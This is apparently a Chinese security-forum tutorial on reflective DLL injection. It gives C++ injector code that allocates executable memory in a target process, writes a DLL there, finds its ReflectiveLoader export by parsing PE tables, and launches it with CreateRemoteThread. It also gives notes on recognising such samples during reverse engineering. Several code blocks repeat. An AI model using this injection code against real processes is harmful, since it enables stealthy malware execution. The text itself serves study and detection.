原理:这里只说注射器实现的功能:在目标进程开辟空间,将Payload写到开辟的空间去,最后调用DLL中的反射加载函数。
实现:
前期实现就不多说,包括:获取目标进程PID,提升当前进程权限,在上一篇文章中已经给出了代码。
在上一篇文章《
常见进程注入的实现及内存dump分析——经典DLL注入》中,介绍了经典DLL注入,虽然简单,但是是注入的基本原理,在上篇文章中没有提到的是:32位的注入程序要注入32位的进程中,不要试图注入64位进程,这种注入确实是可以实现,但是很麻烦,所以就放到最后去学习。
由于反射式DLL比较复杂,这篇文章只是注射器的实现和分析,源码参考自GitHub,同样,会在文章末尾贴上地址。
反射式DLL我理解就是让DLL自身不使用LoadLibraryA函数,将自身映射到目标进程内存中。
OS:Windows 10 PRO 1709
IDE:Visual Studio 2015 Community
语言:Visual C++
LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);//创建缓冲区
if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)//将DLL数据复制到缓冲区
BreakForError("Failed to read the DLL file");
LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);//创建缓冲区
if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)//将DLL数据复制到缓冲区
BreakForError("Failed to read the DLL file");
HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
HANDLE hMoudle = LoadRemoteLibraryR(hTargetProcess, lpBuffer, dwLength, NULL);
HANDLE hMoudle = LoadRemoteLibraryR(hTargetProcess, lpBuffer, dwLength, NULL);
//获取加载器的地址(文件偏移)
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
//在目标进程分配内存(RWX)
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//写数据
WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL);
//线程函数的地址=基地址+文件偏移
LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset);
//创建远程线程
hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);
//获取加载器的地址(文件偏移)
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
//在目标进程分配内存(RWX)
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//写数据
WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL);
//线程函数的地址=基地址+文件偏移
LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset);
//创建远程线程
hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);
- 得到PE头的地址。
- 得到导出函数表结构体指针的地址。
- 获取导出表结构体的内存地址(RVA)。
- 找到导出表名称数组在内存中的地址(RVA)。
- 获取导出函数地址表在内存中的地址(RVA)。
- 获取导出函数序号表在内存中的地址(RVA)。
- 通过导出函数名来获取导出函数地址(RVA)。
//基址->在Dropper进程中开辟的堆空间的起始地址
UINT_PTR uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
//得到NT头的文件地址
UINT_PTR uiExportDir = (UINT_PTR)uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
//获得导出表结构体指针的地址
UINT_PTR uiNameArray = (UINT_PTR)&(((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
//该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址
//结果为找到到导出表结构体的内存地址
uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
//得到导出表名称数组在内存中的地址RVA
uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
//得到导出函数地址表在内存中的地址RVA
UINT_PTR uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//得到函数序号地址表在内存中的地址
UINT_PTR uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
//导出函数的数量
DWORD dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
while (dwCounter--)
{
//这里需要将获取到的各表的RVA转化为各表实际的文件偏移
char *cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset((*(DWORD*)uiNameArray), uiBaseAddress));
if (strstr(cpExportedFunctionName, "ReflectiveLoader") != NULL)
{
//获取地址表起始地址的实际位置
uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//根据序号找到序号对应的函数地址
uiAddressArray += (*(WORD*)(uiNameOrdinals) * sizeof(DWORD));
// 返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址
return Rva2Offset((*(DWORD*)uiAddressArray), uiBaseAddress);
}
uiNameArray += sizeof(DWORD);
uiNameOrdinals += sizeof(WORD);
}
//基址->在Dropper进程中开辟的堆空间的起始地址
UINT_PTR uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
//得到NT头的文件地址
UINT_PTR uiExportDir = (UINT_PTR)uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
//获得导出表结构体指针的地址
UINT_PTR uiNameArray = (UINT_PTR)&(((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
//该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址
//结果为找到到导出表结构体的内存地址
uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
//得到导出表名称数组在内存中的地址RVA
uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
//得到导出函数地址表在内存中的地址RVA
UINT_PTR uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//得到函数序号地址表在内存中的地址
UINT_PTR uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
//导出函数的数量
DWORD dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
while (dwCounter--)
{
//这里需要将获取到的各表的RVA转化为各表实际的文件偏移
char *cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset((*(DWORD*)uiNameArray), uiBaseAddress));
if (strstr(cpExportedFunctionName, "ReflectiveLoader") != NULL)
{
//获取地址表起始地址的实际位置
uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//根据序号找到序号对应的函数地址
uiAddressArray += (*(WORD*)(uiNameOrdinals) * sizeof(DWORD));
// 返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址
return Rva2Offset((*(DWORD*)uiAddressArray), uiBaseAddress);
}
uiNameArray += sizeof(DWORD);
uiNameOrdinals += sizeof(WORD);
}
DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
//得到nt头在内存中的实际地址
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
//获得节表
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
//不在任意块内
if (dwRva < pSectionHeader[0].PointerToRawData)
return dwRva;
//通过遍历块,来找到相对偏移地址对应的文件偏移地址
for (WORD wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
{
if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
//\------------------块内偏移-------------------/ \-----------块在文件中的偏移------------/
}
}
DWORD Rva2Offset(DWORD dwRva, UINT_PTR uiBaseAddress)
{
//得到nt头在内存中的实际地址
PIMAGE_NT_HEADERS pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
//获得节表
PIMAGE_SECTION_HEADER pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
//不在任意块内
if (dwRva < pSectionHeader[0].PointerToRawData)
return dwRva;
//通过遍历块,来找到相对偏移地址对应的文件偏移地址
for (WORD wIndex = 0; wIndex < pNtHeaders->FileHeader.NumberOfSections; wIndex++)
{
if (dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData))
return (dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData);
//\------------------块内偏移-------------------/ \-----------块在文件中的偏移------------/
}
}
回想我们注射器实现的过程中所调用的函数,与正常的注入似乎没有太大的区别,而且像CreateRemoteProcess这种危险函数杀软抓的很严,是可以被替换掉的,而且没有发现LoadLibraryA函数。但这个样本有明显的特征:解析PE结构,所以当我们遇到这种样本的时候,可以考虑为反射式DLL注入。
优点:没有使用获取LoadLibraryA函数。
GetReflectiveLoaderOffset F5后的代码
从图中可以看到,有大量调用同一个函数的情况,并且有字符串比较。
Rva2Offset F5后的代码
这张图中,具有特征性的应该就是这些数字了,如果根据之前的想法,怀疑这是个反射式DLL注射,进入到这个函数的时候,可以去思考这是不是在解析PE文件。当然,如果动态跟踪的话,及时查看内存,也可以分辨的出来。
《Windows PE权威指南》
*测试时使用的DLL为该源码编译的DLL。
LPVOID lpBuffer = HeapAlloc(GetProcessHeap(), 0, dwLength);//创建缓冲区
if (ReadFile(hFile, lpBuffer, dwLength, &dwBytesRead, NULL) == false)//将DLL数据复制到缓冲区
BreakForError("Failed to read the DLL file");
HANDLE hTargetProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
HANDLE hMoudle = LoadRemoteLibraryR(hTargetProcess, lpBuffer, dwLength, NULL);
//获取加载器的地址(文件偏移)
DWORD dwReflectiveLoaderOffset = GetReflectiveLoaderOffset(lpBuffer);
//在目标进程分配内存(RWX)
LPVOID lpRemoteLibraryBuffer = VirtualAllocEx(hProcess, NULL, dwLength, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
//写数据
WriteProcessMemory(hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL);
//线程函数的地址=基地址+文件偏移
LPTHREAD_START_ROUTINE lpReflectiveLoader = (LPTHREAD_START_ROUTINE)((ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset);
//创建远程线程
hThread = CreateRemoteThread(hProcess, NULL, 1024 * 1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId);
//基址->在Dropper进程中开辟的堆空间的起始地址
UINT_PTR uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
//得到NT头的文件地址
UINT_PTR uiExportDir = (UINT_PTR)uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
//获得导出表结构体指针的地址
UINT_PTR uiNameArray = (UINT_PTR)&(((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]);
//该调用中,第一个参数即为导出表结构体映射到内存的相对虚拟地址
//结果为找到到导出表结构体的内存地址
uiExportDir = uiBaseAddress + Rva2Offset(((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress);
//得到导出表名称数组在内存中的地址RVA
uiNameArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNames, uiBaseAddress);
//得到导出函数地址表在内存中的地址RVA
UINT_PTR uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//得到函数序号地址表在内存中的地址
UINT_PTR uiNameOrdinals = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfNameOrdinals, uiBaseAddress);
//导出函数的数量
DWORD dwCounter = ((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->NumberOfNames;
while (dwCounter--)
{
//这里需要将获取到的各表的RVA转化为各表实际的文件偏移
char *cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset((*(DWORD*)uiNameArray), uiBaseAddress));
if (strstr(cpExportedFunctionName, "ReflectiveLoader") != NULL)
{
//获取地址表起始地址的实际位置
uiAddressArray = uiBaseAddress + Rva2Offset(((PIMAGE_EXPORT_DIRECTORY)uiExportDir)->AddressOfFunctions, uiBaseAddress);
//根据序号找到序号对应的函数地址
uiAddressArray += (*(WORD*)(uiNameOrdinals) * sizeof(DWORD));
// 返回ReflectiveLoader函数的文件偏移,即函数机器码的起始地址
return Rva2Offset((*(DWORD*)uiAddressArray), uiBaseAddress);
}
uiNameArray += sizeof(DWORD);
uiNameOrdinals += sizeof(WORD);
}
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2019-1-11 19:08
被kanxue编辑
,原因: